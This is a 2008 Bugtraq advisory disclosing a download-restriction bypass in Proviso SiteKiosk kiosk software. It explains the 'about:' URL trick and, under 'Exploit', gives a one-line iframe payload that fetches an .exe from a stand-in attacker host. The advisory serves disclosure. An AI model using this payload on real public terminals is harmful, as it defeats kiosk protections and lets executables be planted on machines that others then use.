[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Proviso SiteKiosk File Download Vulnerability
From:       nebelfrost23 () web ! de
Date:       2008-03-29 22:08:56
Message-ID: 20080329220856.2538.qmail () securityfocus ! com
[Download RAW message or body]


[>>] Proviso SiteKiosk File Download Vulnerability [<<]


[x] Vendor Information:

"SiteKiosk is a software for public access internet terminals and lets you turn any \
computer into a secure multilanguage Internet terminal (already 20 different \
languages included), allowing the user to access the Internet but protecting the \
underlying operating system and files. Possible uses include presentations, \
exhibitions, libraries, and more. SiteKiosk works with normal displays and \
Touchscreens. A keyboard doesn't even have to be attached -- text can be entered via \
a keypad with a mouse. Plentiful options let you decide the amount of security your \
kiosk needs, from hard-disk protection to prohibiting specific Websites. The program \
can be used with either a direct network connection or Dial-Up Networking, providing \
Internet access "on demand." Other features include multiple-window support, \
automatic shutdown/restart, Shell-Replacement, hard-disk protection, thorough \
event-logging support, Log-Out Button, content-advisor, great website filtering (with \
automatic update)  , an easy-to-use configuration wizard, and more. SiteKiosk \
supports different payment methods like coin machines, bill acceptors, smart cards \
and others. Also very nice is the webcam support which enables users to send voice, \
video and photo emails. It is also possible to administer terminals by remote. \
SiteKiosk uses Internet Explorer as its basis but presents a much simplified \
interface that even the novice user will understand. Excellent online help is \
included."

[x] Attack Information

SiteKiosk tries to block and avoid file downloads. If you click on a link which saves \
a file automatically on your hard drive (e.g. an exe download link) or if you right \
click something and select "save as..." a window will pop up which says that it isn't \
possible to download the file. But you can bypass the issue with a special url - \
you've got to use the "about:"-url. SiteKiosk uses the microsoft internet explorer \
engine to display web sites, so you can also use "about:" to display anything \
directloy from the url. For example "about:hello" will display the text "hello" \
directly in the browser. Of course you can use HTML too: "about:<b>hello</b>" will \
display the text "hello" bold. Normally this is harmless, but in SiteKiosk you can \
use it to download files.

[x] Exploit

Just access this url:

about:<iframe src="http://www.attacker.com/file.exe"></iframe>

[x] Patch

None

[x] Credits

The vulnerability has been discovered by katharsis -

www.katharsis.x2.to


[prev in list] [next in list] [prev in thread] [next in thread]